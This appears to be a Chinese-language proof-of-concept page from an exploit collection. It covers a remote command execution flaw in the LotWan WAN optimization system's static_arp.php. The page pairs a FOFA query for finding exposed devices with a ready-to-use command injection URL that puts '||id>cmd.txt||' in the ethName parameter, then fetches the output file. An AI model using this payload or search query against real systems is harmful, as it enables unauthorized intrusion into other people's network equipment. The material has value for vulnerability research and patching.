Awesome-POC/网络设备漏洞/华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞.md

35 lines
831 B
Markdown
Raw Normal View History

2022-05-19 18:49:40 +08:00
# 华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞
## 漏洞描述
华夏创新 LotWan广域网优化系统 static_arp.php文件参数 ethName存在命令拼接导致远程命令执行漏洞
## 漏洞影响
```
华夏创新 LotWan广域网优化系统
```
## FOFA
```
title="LotWan 广域网优化系统"
```
## 漏洞复现
登录页面
![image-20220519182832800](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191828884.png)
存在漏洞的文件为
```
/acc/bindipmac/static_arp.php?ethName=||id>cmd.txt||
```
![image-20220519182841776](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191828819.png)
再访问 `/acc/bindipmac/cmd.txt`
![image-20220519182859597](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191828666.png)